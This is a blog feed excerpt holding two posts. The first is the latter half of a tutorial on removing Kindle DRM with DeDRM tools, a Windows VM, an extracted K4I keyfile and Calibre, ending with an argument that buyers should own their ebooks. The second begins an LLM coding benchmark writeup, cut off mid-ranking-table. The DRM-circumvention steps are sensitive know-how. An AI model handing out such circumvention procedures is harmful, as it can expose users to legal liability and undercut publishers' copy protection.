<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Then recreate the container. The Windows disk remains in the persistent volume:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">omarchy-windows-vm stop
</span></span><span class="line"><span class="cl">omarchy-windows-vm launch -k</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The <code>-k</code> keeps the VM running after you close RDP. You can also watch it boot in a browser at <code>http://127.0.0.1:8006</code>.</p>
<!-- Screenshot pending: Windows 11 in dockur, open through Omarchy. -->
<h2>Downloading the books with the right app<span class="hx:absolute hx:-mt-20" id="downloading-the-books-with-the-right-app"></span>
    <a href="#downloading-the-books-with-the-right-app" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Inside Windows, open the Microsoft Store and install <strong><a href="https://apps.microsoft.com/detail/9p8jq0jjstll"target="_blank" rel="noopener">Amazon Kindle: Reading App</a></strong>, product <code>9P8JQ0JJSTLL</code>.</p>
<p>Pay attention here. The old Kindle for PC installer found on blogs is not the same app. The tool I used looks for the Microsoft Store package <code>AMZNKindle.AmazonKindleReadingApp</code>. With the legacy program, it simply replies <code>No AmazonKindleReadingApp installation found</code>.</p>
<p>Sign in to your account and download every book you want to preserve. Opening the cover or seeing the title in your library isn&rsquo;t enough. The content must be available offline inside the app.</p>
<p>Unfortunately, the most annoying part is still manual. Amazon found room for a one-click purchase button, but apparently not for a &ldquo;download everything I&rsquo;ve paid for&rdquo; button.</p>
<p>I did this for 106 books. Yes, it was a pain in the ass.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/2026/07/30/kindle-dedrm/kindle-store-library.webp" alt="The Microsoft Store Kindle app with the ebooks downloaded to its local library."  loading="lazy" /></p>
<h2>Generating KFX-ZIP files and the K4I key<span class="hx:absolute hx:-mt-20" id="generating-kfx-zip-files-and-the-k4i-key"></span>
    <a href="#generating-kfx-zip-files-and-the-k4i-key" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>The <code>DeDRM_tools.zip</code> we extracted on Linux is already visible in Windows through the shared directory. Open PowerShell and switch to that directory:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-powershell" data-lang="powershell"><span class="line"><span class="cl"><span class="nb">cd </span><span class="p">\\</span><span class="n">host</span><span class="p">.</span><span class="n">lan</span><span class="p">\</span><span class="n">Data</span><span class="p">\</span><span class="nb">Kindle-DeDRM</span><span class="p">\</span><span class="n">v10</span><span class="p">.</span><span class="py">0</span><span class="p">.</span><span class="py">28</span>
</span></span><span class="line"><span class="cl"><span class="p">.\</span><span class="n">MSIXKFXArchiverMobi1_18632</span><span class="p">.</span><span class="n">exe</span></span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>The banner may still mention an older <code>1.0.15230</code> build. The versioned executable above looks for Store app <code>1.0.18632</code>, and that&rsquo;s the one that worked for me. The number in the file name must match <strong>your</strong> app version: if the Store already delivered a newer one, download the matching release from the project&rsquo;s page (see the update in the plugins section).</p>
<p>This executable finds the current Microsoft Store app&rsquo;s cache, gathers each book&rsquo;s components, and produces two things:</p>
<ul>
<li><code>archived_kfx/</code>, containing one <code>.kfx-zip</code> for every downloaded ebook;</li>
<li><code>oldbooks.k4i</code>, the keyfile DeDRM needs to open those files.</li>
</ul>
<p>On my machine, the process found and archived <strong>106 books</strong>. The SHA-256 of the executable I ran was:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">0c78b45ccea2c36a5fbb01b9f66bdd9e5d5960a68a340ba2ee96e138f5cddf4a</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>It is a 32-bit binary. If it complains about a missing <code>MSVCP140.dll</code>, install the <a href="https://aka.ms/vc14/vc_redist.x86.exe"target="_blank" rel="noopener">official Microsoft Visual C++ Redistributable x86</a>. Do not hunt for a loose DLL on Google. That&rsquo;s a great way to turn a book backup into a malware backup.</p>
<p>The <code>oldbooks.k4i</code> file is sensitive. It is derived from your account secret in that Kindle installation. Do not publish it, attach it to a GitHub issue, screenshot its contents, or put it in a public repository.</p>
<!-- Screenshot pending: PowerShell after the archiver generates archived_kfx and oldbooks.k4i. -->
<h2>Configuring the key in DeDRM<span class="hx:absolute hx:-mt-20" id="configuring-the-key-in-dedrm"></span>
    <a href="#configuring-the-key-in-dedrm" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Back on Linux, open Calibre and follow this path:</p>
<p><strong>Preferences → Plugins → DeDRM → Customize plugin → Kindle for Mac/PC ebooks → Import Existing Keyfiles</strong></p>
<p>Select:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">~/Windows/Kindle-DeDRM/v10.0.28/oldbooks.k4i</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Use <strong>Import Existing Keyfiles</strong>. Do not use the generic <strong>Set Keyfile</strong> button on the main screen. It records a different kind of key candidate and does not register the K4I key in the right place.</p>
<p>Close the key list, click <strong>OK</strong> in the main configuration window, and restart Calibre. If you close it with Cancel, it quietly throws the change away.</p>
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/2026/07/30/kindle-dedrm/calibre-dedrm-key.webp" alt="DeDRM with the oldbooks keyfile imported into the Kindle for Mac/PC key list."  loading="lazy" /></p>
<h2>Importing and converting to EPUB<span class="hx:absolute hx:-mt-20" id="importing-and-converting-to-epub"></span>
    <a href="#importing-and-converting-to-epub" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Before dumping a hundred files into the library, test one.</p>
<p>Choose a <code>.kfx-zip</code> from:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">~/Windows/Kindle-DeDRM/v10.0.28/archived_kfx/</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>Use <strong>Add books</strong> in Calibre. Internally, the order is:</p>
<ol>
<li>KFX Input recognizes the package;</li>
<li>DeDRM tries the K4I keys during import;</li>
<li>KFX Input assembles the decrypted book as KFX;</li>
<li>Calibre can now open and convert the result.</li>
</ol>
<p>If the format still appears as <code>KFX-ZIP</code>, it failed. Clicking Convert ten times won&rsquo;t help. Remove that entry from the library, fix the plugin or key, and import it again. DeDRM only acts on <strong>input</strong>.</p>
<p>When the book appears as <code>KFX</code>, open it in the viewer and check a few pages. Then click <strong>Convert books</strong>, choose <strong>EPUB</strong> as the output, and test the resulting file on the reader you plan to use. Only then should you run the batch import.</p>
<p>In my case, the KFX opened, converted, and the EPUB worked outside Kindle. That told me the entire path was working: Microsoft Store, TPM, archiver, K4I, DeDRM 10.0.28, and KFX Input 2.33.0.</p>
<!-- Screenshot pending: book imported as KFX in Calibre. -->
<p><img src="https://new-uploads-akitaonrails.s3.us-east-2.amazonaws.com/2026/07/30/kindle-dedrm/calibre-convert-epub.webp" alt="Calibre’s conversion dialog with EPUB selected as the output format."  loading="lazy" /></p>
<!-- Screenshot pending: final EPUB open on the Xteink X4. -->
<h2>Back up what actually matters<span class="hx:absolute hx:-mt-20" id="back-up-what-actually-matters"></span>
    <a href="#back-up-what-actually-matters" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>After the conversion, I preserve three things:</p>
<ul>
<li>the final EPUBs, which I can read on any device;</li>
<li>the original KFX-ZIP files, until I&rsquo;ve verified that every EPUB is intact;</li>
<li><code>oldbooks.k4i</code>, encrypted and stored separately from the library.</li>
</ul>
<p>My plaintext keyfile has <code>0600</code> permissions. I also keep an encrypted copy using SOPS and age, with the private key in a separate backup. Do not put a raw <code>oldbooks.k4i</code> in Git just because the repository is private. Private repositories leak too.</p>
<p>The EPUBs follow the same strategy I use for other important files: a local copy, NAS, and off-site backup. I explained this paranoia in <a href="/2023/10/19/akitando-146-protegendo-e-recuperando-dados-perdidos-git-backup-btrfs/">Protecting and Recovering Lost Data</a> and showed the same philosophy applied to movies in <a href="/en/2024/04/03/my-personal-netflix-with-docker-compose/">My Personal Netflix</a>.</p>
<p>Do not delete files from the Kindle or the VM the minute conversion finishes. Open the EPUBs and check the cover, table of contents, images, notes, and a few pages. A backup you&rsquo;ve never tested is just wishful thinking.</p>
<h2>Conclusion<span class="hx:absolute hx:-mt-20" id="conclusion"></span>
    <a href="#conclusion" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>Amazon has remotely deleted books, publishers update covers and content, old apps stop working, and formats change. The end of Download &amp; Transfer via USB proved that a feature available for eighteen years can disappear with one line in a notice.</p>
<p>The classic example is still unbelievable: in 2009, Amazon deleted <code>1984</code> and <code>Animal Farm</code> by George Orwell from customers&rsquo; Kindles. Later, revisions to Roald Dahl, R.L. Stine, and Agatha Christie were pushed into digital copies people had already bought. The <a href="https://www.vice.com/en/article/amazon-is-killing-your-ability-to-download-kindle-books-next-week/"target="_blank" rel="noopener">Vice article</a> summarizes those cases. Dammit Jeff makes the same point often: even the original cover you chose can turn into an ugly poster for the streaming adaptation because the publisher and store decided to update your &ldquo;purchase.&rdquo;</p>
<p>It doesn&rsquo;t matter whether the next change is censorship, a legitimate correction, another horrible Netflix adaptation cover, or a plain bug. I bought an edition. I want to preserve the edition I bought.</p>
<p>DRM does not stop piracy. A popular book lands on torrents the day it comes out. DRM only gets in the paying customer&rsquo;s way, makes accessibility harder, locks up perfectly good hardware, and turns a purchase into an indefinite rental.</p>
<p>Calibre, DeDRM, KFX Input, and a disposable VM gave me my library back. I can now put those EPUBs on the Xteink, a Kobo, a tablet, my phone, or a reader that doesn&rsquo;t even exist yet. I can switch operating systems and turn off the internet. The files stay with me.</p>
<p>If it isn&rsquo;t on your machine, it isn&rsquo;t yours.</p>
]]></content:encoded><category>storage-and-backup</category><category>linux</category><category>open-source</category></item><item><title>New LLM Benchmark: I Reran Every Test!</title><link>https://www.akitaonrails.com/en/2026/07/30/new-llm-benchmark-i-reran-every-test/</link><guid isPermaLink="true">https://www.akitaonrails.com/en/2026/07/30/new-llm-benchmark-i-reran-every-test/</guid><pubDate>Thu, 30 Jul 2026 15:00:00 GMT</pubDate><description>&lt;p&gt;Five days ago I published my &lt;a href="https://www.akitaonrails.com/en/2026/07/25/llm-benchmark-is-opus-5-any-good/"&gt;Claude Opus 5 test&lt;/a&gt;. Eleven days ago I explained &lt;a href="https://www.akitaonrails.com/en/2026/07/19/llm-benchmark-should-i-use-the-highest-scoring-model/"&gt;why the highest score in a ranking does not mean &amp;ldquo;the best LLM&amp;rdquo;&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Great. The table in the first article is already a museum piece.&lt;/p&gt;
&lt;p&gt;The argument in the second one still stands. In fact, it got even easier to demonstrate because I spent the last few days rerunning practically the entire benchmark. That meant dozens of runs, several discarded attempts, hundreds of dollars between API charges and credit equivalents, and an indecent amount of time reading robot-generated Rails code.&lt;/p&gt;</description><content:encoded><![CDATA[<p>Five days ago I published my <a href="/en/2026/07/25/llm-benchmark-is-opus-5-any-good/">Claude Opus 5 test</a>. Eleven days ago I explained <a href="/en/2026/07/19/llm-benchmark-should-i-use-the-highest-scoring-model/">why the highest score in a ranking does not mean &ldquo;the best LLM&rdquo;</a>.</p>
<p>Great. The table in the first article is already a museum piece.</p>
<p>The argument in the second one still stands. In fact, it got even easier to demonstrate because I spent the last few days rerunning practically the entire benchmark. That meant dozens of runs, several discarded attempts, hundreds of dollars between API charges and credit equivalents, and an indecent amount of time reading robot-generated Rails code.</p>
<p>The result is <strong>version 2</strong> of my <a href="https://github.com/akitaonrails/llm-coding-benchmark"target="_blank" rel="noopener">LLM Coding Benchmark</a>. The test got harder, the audit became more explicit, and each family now runs, whenever possible, in the harness where it should work best.</p>
<p>I&rsquo;ll say this up front: <strong>v2 scores are not directly comparable to v1 scores</strong>. The prompt changed. So did the requirements, several model-harness pairings, the validation, and the rubric. The <code>v1</code> column in the report is historical context, not a scientific measurement of how much each model &ldquo;improved.&rdquo;</p>
<h2>Why I retired v1<span class="hx:absolute hx:-mt-20" id="why-i-retired-v1"></span>
    <a href="#why-i-retired-v1" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>We ran v1 for months. It did a good job separating models that could actually build a Rails app from those that invented RubyLLM APIs, wrote tests for their own hallucinations, and shipped Dockerfiles that never came up.</p>
<p>Then the newer models hit the ceiling of that test. Fifteen of the forty results were already packed into Tier A, with the top compressed between 92 and 97. The job still had real details, but the best models cleared the old discriminators easily. The order started coming down to an API-key preflight here, a cookie limit there, one missing error test. Valid details, not much separation.</p>
<p>There was another operational inconsistency: the model-harness pairing. Claude had been tested in OpenCode. So had Grok, Kimi, and Gemini. Today we have Claude Code, Codex, Kimi Code CLI, grok CLI, and Antigravity. Measuring a model in a generic harness when an integration tailored to its behavior exists can distort the result.</p>
<p>The benchmark was never measuring the weights file alone:</p>
<div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code">

<div><div class="highlight"><pre tabindex="0" class="chroma"><code class="language-text" data-lang="text"><span class="line"><span class="cl">result = model + harness + prompt + tools + context + execution + audit</span></span></code></pre></div></div><div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0">
  <button
    class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
    title="Copy code"
  >
    <div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"></div>
<div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"></div>
  </button>
</div>
</div>
<p>So I stopped hiding the harness inside the score. Claude moved to Claude Code. GPT moved to Codex. Kimi K3 and K2.7-Coding moved to Kimi CLI. Grok and Gemini got A/B runs in their vendors&rsquo; own CLIs. A fully isolated OpenCode remained the fallback for models without a better harness or subscription access.</p>
<h2>The new test<span class="hx:absolute hx:-mt-20" id="the-new-test"></span>
    <a href="#the-new-test" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>V1 had two phases: build the app and try to bring it up. V2 has <strong>three phases</strong>, fourteen numbered goals, and a ten-dimension rubric.</p>
<p>In phase one, the model still has to build a ChatGPT-style chat app on its own in Rails with RubyLLM, Hotwire, Tailwind, Minitest, Docker, and Compose. That&rsquo;s where the resemblance ends. Now it must also deliver:</p>
<ul>
<li>real per-token streaming through Turbo Streams, proven to be incremental;</li>
<li>a correct multi-turn payload that does not send the current message twice, plus a test for the exact array sent to the provider;</li>
<li>persistence that survives a restart and works with <code>WEB_CONCURRENCY=2</code>, with a TTL plus message-count and byte limits;</li>
<li>exactly two tools, <code>server_time</code> and a safe calculator, using the real RubyLLM API;</li>
<li>a title generated through the structured-output API;</li>
<li>a per-conversation token budget;</li>
<li>a system prompt, credential preflight, degraded states, and provider-error handling;</li>
<li>a guarantee that failed turns never contaminate future history;</li>
<li>clean RuboCop, Brakeman, and bundle-audit runs, plus a non-root production Docker image and no secrets.</li>
</ul>
<p>Phase two does not accept a README claiming everything works. It boots Rails, watches the tokens arrive, forces real tool calls, holds a conversation across two workers, restarts the server, checks the history, runs tests and gates, executes <code>docker build</code>, and sends a real message to the app inside Compose.</p>
<p>Phase three asks the model to review every goal as <code>PASS</code>, <code>PARTIAL</code>, or <code>FAIL</code>, cite a file, line, test, or command, and write down what is still broken. That honesty is worth 15 points. An accurate <code>FAIL</code> is worth more than an optimistic <code>PASS</code> that the audit disproves.</p>
<p>This phase produced data v1 never had. Kimi K3 and Nex, for example, admitted defects that would have been easy to hide. Others built a reasonable app and then hallucinated their own inspection. Programming and reviewing what you programmed are different capabilities.</p>
<h2>The harness became part of the test<span class="hx:absolute hx:-mt-20" id="the-harness-became-part-of-the-test"></span>
    <a href="#the-harness-became-part-of-the-test" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>I also ran A/B tests with the native tools:</p>
<table>
  <thead>
      <tr>
          <th>Model</th>
          <th style="text-align: right">Clean OpenCode</th>
          <th style="text-align: right">Native harness</th>
          <th>Reading</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Grok 4.5</td>
          <td style="text-align: right">92</td>
          <td style="text-align: right">91 in grok CLI</td>
          <td>difference within the noise</td>
      </tr>
      <tr>
          <td>Grok 4.3</td>
          <td style="text-align: right">18</td>
          <td style="text-align: right">55 in grok CLI</td>
          <td>native scaffolding rescues it, but it remains weak</td>
      </tr>
      <tr>
          <td>Gemini 3.1 Pro</td>
          <td style="text-align: right">62</td>
          <td style="text-align: right">88 in Antigravity</td>
          <td>the direct path avoids a provider bug</td>
      </tr>
      <tr>
          <td>Gemini 3.6 Flash</td>
          <td style="text-align: right">not run</td>
          <td style="text-align: right">92 in Antigravity</td>
          <td>good result, no comparable baseline</td>
      </tr>
  </tbody>
</table>
<p>A native harness does not sprinkle magic dust on a model. Grok 4.5 barely cared. Grok 4.3 needed the structure. Gemini 3.1 needed a transport that would not break on <code>Corrupted thought signature</code>. Three different mechanisms that a rushed comparison would flatten into &ldquo;the CLI improved the score.&rdquo;</p>
<p>In the ranking below, I use the preferred harness whenever a complete run exists: Antigravity for the Geminis and grok CLI for the Groks. The OpenCode baselines remain in the repository as A/B data, but do not appear a second time in the table.</p>
<h2>The new ranking<span class="hx:absolute hx:-mt-20" id="the-new-ranking"></span>
    <a href="#the-new-ranking" class="subheading-anchor" aria-label="Permalink for this section"></a></h2><p>This is the consolidated v2 table, with one entry per model in the preferred available harness.</p>
<table>
  <thead>
      <tr>
          <th style="text-align: right">#</th>
          <th>Model</th>
          <th style="text-align: right">Score</th>
          <th style="text-align: center">Tier</th>
          <th>Harness</th>
          <th style="text-align: right">Time</th>
          <th style="text-align: right">Cost</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td style="text-align: right">1</td>
          <td>Claude Fable 5</td>
          <td style="text-align: right"><strong>96</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$26.03</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Sonnet 5</td>
          <td style="text-align: right"><strong>95</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">59 min</td>
          <td style="text-align: right">$25.83</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Claude Opus 5</td>
          <td style="text-align: right"><strong>95</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">78 min</td>
          <td style="text-align: right">$38.91</td>
      </tr>
      <tr>
          <td style="text-align: right">2</td>
          <td>Kimi K3</td>
          <td style="text-align: right"><strong>95</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Kimi CLI</td>
          <td style="text-align: right">65 min</td>
          <td style="text-align: right">$6.14</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>GPT 5.6 Sol</td>
          <td style="text-align: right"><strong>93</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">~$45</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>Claude Opus 4.8</td>
          <td style="text-align: right"><strong>93</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">53 min</td>
          <td style="text-align: right">$21.82</td>
      </tr>
      <tr>
          <td style="text-align: right">5</td>
          <td>GPT 5.6 Terra</td>
          <td style="text-align: right"><strong>93</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">48 min</td>
          <td style="text-align: right">$16.92</td>
      </tr>
      <tr>
          <td style="text-align: right">8</td>
          <td>GLM 5.2</td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">155 min</td>
          <td style="text-align: right">$0 (≈$12.05)</td>
      </tr>
      <tr>
          <td style="text-align: right">8</td>
          <td>Kimi K2.5</td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">43 min</td>
          <td style="text-align: right">$1.50</td>
      </tr>
      <tr>
          <td style="text-align: right">8</td>
          <td>Gemini 3.6 Flash @ high</td>
          <td style="text-align: right"><strong>92</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Antigravity</td>
          <td style="text-align: right">15 min</td>
          <td style="text-align: right">—</td>
      </tr>
      <tr>
          <td style="text-align: right">11</td>
          <td>MiniMax M3</td>
          <td style="text-align: right"><strong>91</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">113 min</td>
          <td style="text-align: right">$7.72</td>
      </tr>
      <tr>
          <td style="text-align: right">11</td>
          <td>Kimi K2.6</td>
          <td style="text-align: right"><strong>91</strong></td>
          <td style="text-align: center">A.1</td>
          <td>OpenCode</td>
          <td style="text-align: right">34 min</td>
          <td style="text-align: right">$2.64</td>
      </tr>
      <tr>
          <td style="text-align: right">11</td>
          <td>Claude Opus 4.7</td>
          <td style="text-align: right"><strong>91</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Claude Code</td>
          <td style="text-align: right">44 min</td>
          <td style="text-align: right">$44.28</td>
      </tr>
      <tr>
          <td style="text-align: right">11</td>
          <td>GPT 5.6 Luna</td>
          <td style="text-align: right"><strong>91</strong></td>
          <td style="text-align: center">A.1</td>
          <td>Codex</td>
          <td style="text-align: right">46 min</td>
          <td style="text-align: right">$16.79</td>
      </tr>
      <tr>
          <td style="text-align: right">11</td>
          <td>Grok 4.5</td>
          <td style="text-align: right"><strong>91</strong></td>
          <td style="text-align: center">A.1</td>
          <td>grok CLI</td>
          <td style="text-align: right">25 min</td>
          <td style="text-align: right">$0 (≈$1.62)</td>
      </tr>
      <tr>
          <td style="text-align: right">16</td>
          <td>Nex-N2-Pro</td>
          <td style="text-align: right"><strong>88</strong></td>
          <td style="text-align: center">A.2</td>
          <td>OpenCode</td>
          <td style="text-align: right">8 min</td>
          <td style="text-align: right">$0.17</td>
      </tr>
      <tr>
          <td style="text-align: right">16</td>
          <td>GPT 5.5</td>
          <td style="text-align: right"><strong>88</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Codex</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">~$53</td>
      </tr>
      <tr>
          <td style="text-align: right">16</td>
          <td>Gemini 3.1 Pro @ high</td>
          <td style="text-align: right"><strong>88</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Antigravity</td>
          <td style="text-align: right">23 min</td>
          <td style="text-align: right">—</td>
      </tr>
      <tr>
          <td style="text-align: right">19</td>
          <td>Claude Sonnet 4.6</td>
          <td style="text-align: right"><strong>87</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Claude Code</td>
          <td style="text-align: right">45 min</td>
          <td style="text-align: right">$9.90</td>
      </tr>
      <tr>
          <td style="text-align: right">20</td>
          <td>GPT 5.4</td>
          <td style="text-align: right"><strong>86</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Codex</td>
          <td style="text-align: right">67 min</td>
          <td style="text-align: right">~$26</td>
      </tr>
      <tr>
          <td style="text-align: right">20</td>
          <td>Kimi K2.7-Coding</td>
          <td style="text-align: right"><strong>86</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Kimi CLI</td>
          <td style="text-align: right">54 min</td>
          <td style="text-align: right">$4.37</td>
      </tr>
      <tr>
          <td style="text-align: right">22</td>
          <td>Step 3.7 Flash</td>
          <td style="text-align: right"><strong>84</strong></td>
          <td style="text-align: center">A.2</td>
          <td>OpenCode</td>
          <td style="text-align: right">81 min</td>
          <td style="text-align: right">$1.41</td>
      </tr>
      <tr>
          <td style="text-align: right">23</td>
          <td>Claude Opus 4.6</td>
          <td style="text-align: right"><strong>83</strong></td>
          <td style="text-align: center">A.2</td>
          <td>Claude Code</td>
          <td style="text-align: right">39 min</td>
          <td style="text-align: right">$12.83</td>
      </tr>
      <tr>
          <td style="text-align: right">23</td>
          <td>GLM 5</td>
          <td style="text-align: right"><strong>83</strong></td>
          <td style="text-align: center">A.2</td>
          <td>OpenCode</td>
          <td style="text-align: right">31 min</td>
          <td style="text-align: right">$1.97</td>
      </tr>
      <tr>
          <td style="text-align: right">25</td>
          <td>DeepSeek V4 Pro</td>
          <td style="text-align: right"><strong>82</strong></td>
          <td style="text-align: center">B</td>
          <td>OpenCode</td>
          <td style="text-align: right">57 min</td>
          <td style="text-align: right">$0.35</td>
      </tr>
      <tr>
          <td style="text-align: right">26</td>
          <td>DeepSeek V4 Flash</td>
          <td style="text-align: right"><strong>80</strong></td>
          <td style="text-align: center">B</td>
          <td>OpenCode</td>
          <td style="text-align: right">36 min</td>
          <td style="text-align: right">$0.81</td>
      </tr>
      <tr>
          <td style="text-align: right">27</td>
          <td>Qwen 3.6 Plus</td>
          <td style="text-align: right"><strong>76</strong></td>
          <td style="text-align: center">B</td>
